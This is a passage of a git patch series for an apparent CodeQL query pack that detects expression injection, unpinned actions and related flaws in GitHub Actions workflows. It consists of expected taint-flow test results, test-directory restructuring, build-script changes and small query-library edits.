.github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | diff --git a/ql/src/test/test.expected b/ql/src/test/test.expected index 5dd2313e8518..49ec00e20f70 100644 --- a/ql/src/test/test.expected +++ b/ql/src/test/test.expected @@ -27,6 +27,10 @@ edges | .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | +| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | @@ -93,6 +97,11 @@ nodes | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | semmle.label | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | semmle.label | output workflow-output1: [workflow-output1] | | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | semmle.label | output workflow-output1: [workflow-output2] | @@ -144,6 +153,7 @@ subpaths | .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ github.event.after }}, which may be controlled by an external user. | | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential injection from the ${{ steps.trim-url.outputs.trimmed_url }}, which may be controlled by an external user. | | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | Potential injection from the ${{ needs.job1.outputs.job_output }}, which may be controlled by an external user. | +| .github/workflows/matrix.yml:41:12:42:31 | \| | .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:41:12:42:31 | \| | Potential injection from the ${{ matrix.language }}, which may be controlled by an external user. | | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | Potential injection from the ${{ inputs.config-path }}, which may be controlled by an external user. | | .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential injection from the ${{ steps.summary.outputs.value }}, which may be controlled by an external user. | | .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential injection from the ${{ steps.step.outputs.value }}, which may be controlled by an external user. | From 5b40d98849f571d683111ef8ab9e721be5cede89 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 28 Feb 2024 14:36:17 +0100 Subject: [PATCH 079/707] Update test db build script --- build-test-dbs.sh | 2 ++ 1 file changed, 2 insertions(+) diff --git a/build-test-dbs.sh b/build-test-dbs.sh index d8fc4359b927..bb85dc78a376 100755 --- a/build-test-dbs.sh +++ b/build-test-dbs.sh @@ -1,4 +1,6 @@ #!/bin/bash +rm -rf ql/lib/test/test.testproj || true +rm -rf ql/src/test/test.testproj || true rm -rf src-test.testproj || true rm -rf lib-test.testproj || true codeql database create src-test.testproj -l yaml -s ql/src/test From 6b11506abb7c42fe0c7cffcaf06f776fb1787873 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 29 Feb 2024 13:23:59 +0100 Subject: [PATCH 080/707] test: Add tests --- .gitignore | 1 + build-test-dbs.sh | 7 - codeql-workspace.yml | 3 +- ql/lib/codeql/actions/Ast.qll | 7 +- .../codeql/actions/ast/internal/Actions.qll | 2 - ql/lib/qlpack.yml | 1 - ...maries.ql => CompositeActionsSummaries.ql} | 0 ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 6 +- .../{CWE-094 => CWE-829}/UntrustedCheckout.md | 0 .../{CWE-094 => CWE-829}/UntrustedCheckout.ql | 2 +- ql/src/qlpack.yml | 1 - ql/src/test/test.expected | 162 ------------ ql/src/test/test.ql | 37 --- ql/test/codeql-pack.lock.yml | 16 ++ .../library-tests}/.github/workflows/test.yml | 0 .../test => test/library-tests}/test.expected | 0 ql/{lib/test => test/library-tests}/test.ql | 0 ql/test/qlpack.yml | 12 + .../.github/workflows/calling_composite.yml | 1 + .../.github/workflows/calling_workflow.yml | 1 + .../.github/workflows/reusable_workflow.yml | 1 + .../CWE-020/CompositeActionsSinks.expected | 15 ++ .../CWE-020/CompositeActionsSinks.qlref | 1 + .../CWE-020/CompositeActionsSources.expected | 12 + .../CWE-020/CompositeActionsSources.qlref | 2 + .../CompositeActionsSummaries.expected | 12 + .../CWE-020/CompositeActionsSummaries.qlref | 2 + .../CWE-020/ReusableWorkflowsSinks.expected | 8 + .../CWE-020/ReusableWorkflowsSinks.qlref | 2 + .../CWE-020/ReusableWorkflowsSources.expected | 12 + .../CWE-020/ReusableWorkflowsSources.qlref | 2 + .../ReusableWorkflowsSummaries.expected | 16 ++ .../CWE-020/ReusableWorkflowsSummaries.qlref | 2 + .../Security/CWE-020/action1}/action.yml | 1 + .../.github/workflows/argus_case_study.yml | 0 .../.github/workflows/changed-files.yml | 0 .../.github/workflows/comment_issue.yml | 28 +++ .../workflows/comment_issue_newline.yml | 10 + .../CWE-094}/.github/workflows/cross1.yml | 0 .../CWE-094}/.github/workflows/cross2.yml | 0 .../CWE-094}/.github/workflows/cross3.yml | 0 .../CWE-094/.github/workflows/discussion.yml | 8 + .../.github/workflows/discussion_comment.yml | 9 + .../CWE-094/.github/workflows/gollum.yml | 11 + .../workflows/image_link_generator.yml | 0 .../CWE-094}/.github/workflows/inter-job.yml | 0 .../CWE-094/.github/workflows/issues.yaml | 20 ++ .../CWE-094}/.github/workflows/matrix.yml | 0 .../CWE-094}/.github/workflows/no-flow1.yml | 0 .../CWE-094}/.github/workflows/no-flow2.yml | 0 .../.github/workflows/pull_request_review.yml | 14 ++ .../workflows/pull_request_review_comment.yml | 14 ++ .../.github/workflows/pull_request_target.yml | 16 ++ .../CWE-094/.github/workflows/push.yml | 16 ++ .../CWE-094}/.github/workflows/simple1.yml | 0 .../CWE-094}/.github/workflows/simple2.yml | 0 .../CWE-094}/.github/workflows/test.yml | 0 .../.github/workflows/workflow_run.yml | 16 ++ .../CriticalExpressionInjection.expected | 227 +++++++++++++++++ .../CWE-094/CriticalExpressionInjection.qlref | 1 + .../CWE-094/ExpressionInjection.expected | 233 ++++++++++++++++++ .../CWE-094/ExpressionInjection.qlref | 1 + .../Security/CWE-094/action1/action.yml | 14 ++ .../Security/CWE-094/action2/action.yml | 17 ++ .../.github/workflows/missing_perms.yml | 10 + .../CWE-275/.github/workflows/perms.yml | 13 + .../MissingActionsPermissions.expected | 1 + .../CWE-275/MissingActionsPermissions.qlref | 2 + .../workflows/actor_trusted_checkout.yml | 0 .../workflows/label_trusted_checkout.yml | 0 .../.github/workflows/unpinned_tags.yml | 11 + .../.github/workflows/untrusted_checkout.yml | 0 .../CWE-829/UnpinnedActionsTag.expected | 7 + .../Security/CWE-829/UnpinnedActionsTag.qlref | 1 + .../CWE-829/UntrustedCheckout.expected | 1 + .../Security/CWE-829/UntrustedCheckout.qlref | 1 + 76 files changed, 833 insertions(+), 216 deletions(-) delete mode 100755 build-test-dbs.sh rename ql/src/Security/CWE-020/{CompositeActionSummaries.ql => CompositeActionsSummaries.ql} (100%) rename ql/src/Security/{CWE-094 => CWE-829}/UntrustedCheckout.md (100%) rename ql/src/Security/{CWE-094 => CWE-829}/UntrustedCheckout.ql (98%) delete mode 100644 ql/src/test/test.expected delete mode 100644 ql/src/test/test.ql create mode 100644 ql/test/codeql-pack.lock.yml rename ql/{lib/test => test/library-tests}/.github/workflows/test.yml (100%) rename ql/{lib/test => test/library-tests}/test.expected (100%) rename ql/{lib/test => test/library-tests}/test.ql (100%) create mode 100644 ql/test/qlpack.yml rename ql/{src/test => test/query-tests/Security/CWE-020}/.github/workflows/calling_composite.yml (99%) rename ql/{src/test => test/query-tests/Security/CWE-020}/.github/workflows/calling_workflow.yml (99%) rename ql/{src/test => test/query-tests/Security/CWE-020}/.github/workflows/reusable_workflow.yml (99%) create mode 100644 ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected create mode 100644 ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.qlref create mode 100644 ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected create mode 100644 ql/test/query-tests/Security/CWE-020/CompositeActionsSources.qlref create mode 100644 ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected create mode 100644 ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.qlref create mode 100644 ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected create mode 100644 ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.qlref create mode 100644 ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected create mode 100644 ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.qlref create mode 100644 ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected create mode 100644 ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.qlref rename ql/{src/test/composite-actions => test/query-tests/Security/CWE-020/action1}/action.yml (99%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/argus_case_study.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/changed-files.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/cross1.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/cross2.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/cross3.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/image_link_generator.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/inter-job.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/matrix.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/no-flow1.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/no-flow2.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/simple1.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/simple2.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-094}/.github/workflows/test.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml create mode 100644 ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-094/action1/action.yml create mode 100644 ql/test/query-tests/Security/CWE-094/action2/action.yml create mode 100644 ql/test/query-tests/Security/CWE-275/.github/workflows/missing_perms.yml create mode 100644 ql/test/query-tests/Security/CWE-275/.github/workflows/perms.yml create mode 100644 ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected create mode 100644 ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref rename ql/{src/test => test/query-tests/Security/CWE-829}/.github/workflows/actor_trusted_checkout.yml (100%) rename ql/{src/test => test/query-tests/Security/CWE-829}/.github/workflows/label_trusted_checkout.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml rename ql/{src/test => test/query-tests/Security/CWE-829}/.github/workflows/untrusted_checkout.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected create mode 100644 ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref diff --git a/.gitignore b/.gitignore index e147f87bf723..6c0e5c58738d 100644 --- a/.gitignore +++ b/.gitignore @@ -2,3 +2,4 @@ **/*.testproj ql/lib/.codeql/ ql/src/.codeql/ +ql/test/.codeql/ diff --git a/build-test-dbs.sh b/build-test-dbs.sh deleted file mode 100755 index bb85dc78a376..000000000000 --- a/build-test-dbs.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash -rm -rf ql/lib/test/test.testproj || true -rm -rf ql/src/test/test.testproj || true -rm -rf src-test.testproj || true -rm -rf lib-test.testproj || true -codeql database create src-test.testproj -l yaml -s ql/src/test -codeql database create lib-test.testproj -l yaml -s ql/lib/test diff --git a/codeql-workspace.yml b/codeql-workspace.yml index ad62591967d0..f00f92b346f9 100644 --- a/codeql-workspace.yml +++ b/codeql-workspace.yml @@ -1,3 +1,4 @@ provide: - "**/ql/src/qlpack.yml" - - "**/ql/lib/qlpack.yml" \ No newline at end of file + - "**/ql/lib/qlpack.yml" + - "**/ql/test/qlpack.yml" diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index c2b1cda8277b..2bbf5c8ac0d7 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -270,7 +270,12 @@ class StepUsesExpr extends StepStmt, UsesExpr { override string getCallee() { result = uses.getGitHubRepository() } - override string getVersion() { result = uses.getVersion() } + override string getVersion() { + result = uses.getVersion() + or + not exists(uses.getVersion()) and + result = "main" + } override Expression getArgumentExpr(string key) { exists(Actions::With with | diff --git a/ql/lib/codeql/actions/ast/internal/Actions.qll b/ql/lib/codeql/actions/ast/internal/Actions.qll index 2fb17eef88bf..fe10441fd67a 100644 --- a/ql/lib/codeql/actions/ast/internal/Actions.qll +++ b/ql/lib/codeql/actions/ast/internal/Actions.qll @@ -6,7 +6,6 @@ import codeql.actions.ast.internal.Yaml import codeql.files.FileSystem -// ALVARO: Make it private /** * Libraries for modeling GitHub Actions workflow files written in YAML. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. @@ -376,7 +375,6 @@ module Actions { } /** - * ALVARO * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds */ class Needs extends YamlNode { diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 3c344549245a..a0f348977abb 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -10,7 +10,6 @@ dependencies: codeql/dataflow: ^0.1.7 dbscheme: yaml.dbscheme extractor: yaml -tests: test groups: - yaml dataExtensions: diff --git a/ql/src/Security/CWE-020/CompositeActionSummaries.ql b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql similarity index 100% rename from ql/src/Security/CWE-020/CompositeActionSummaries.ql rename to ql/src/Security/CWE-020/CompositeActionsSummaries.ql diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 12bc06481bed..3c951a4e0b0c 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -24,15 +24,15 @@ private predicate isTrustedOrg(string repo) { from StepUsesExpr uses, string repo, string version, WorkflowStmt workflow, string name where uses.getCallee() = repo and - uses.getVersion() = version and uses.getEnclosingWorkflowStmt() = workflow and ( workflow.getName() = name or not exists(workflow.getName()) and workflow.getLocation().getFile().getBaseName() = name ) and - not isPinnedCommit(version) and - not isTrustedOrg(repo) + uses.getVersion() = version and + not isTrustedOrg(repo) and + not isPinnedCommit(version) select uses, "Unpinned 3rd party Action '" + name + "' step $@ uses '" + repo + "' with ref '" + version + "', not a pinned commit hash", uses, uses.toString() diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.md b/ql/src/Security/CWE-829/UntrustedCheckout.md similarity index 100% rename from ql/src/Security/CWE-094/UntrustedCheckout.md rename to ql/src/Security/CWE-829/UntrustedCheckout.md diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql similarity index 98% rename from ql/src/Security/CWE-094/UntrustedCheckout.ql rename to ql/src/Security/CWE-829/UntrustedCheckout.ql index bb6c0d9a029f..3c745b5d84aa 100644 --- a/ql/src/Security/CWE-094/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -10,7 +10,7 @@ * @id actions/untrusted-checkout * @tags actions * security - * external/cwe/cwe-094 + * external/cwe/cwe-829 */ import actions diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 346079df9842..aff53d45ddeb 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -11,4 +11,3 @@ defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: githubsecuritylab/actions-all: ${workspace} warnOnImplicitThis: true -tests: test diff --git a/ql/src/test/test.expected b/ql/src/test/test.expected deleted file mode 100644 index 49ec00e20f70..000000000000 --- a/ql/src/test/test.expected +++ /dev/null @@ -1,162 +0,0 @@ -edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | -| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | -| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | -| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | -| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | -| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | -| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | -| .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | -| .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | -| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | -| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | -| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | -| .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | -| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | -| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | -| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | -| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | -| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | -| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | -| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | -| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | -| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | -| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | -| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | -| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | -| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | -| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | -| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | -| .github/workflows/test.yml:8:19:8:49 | 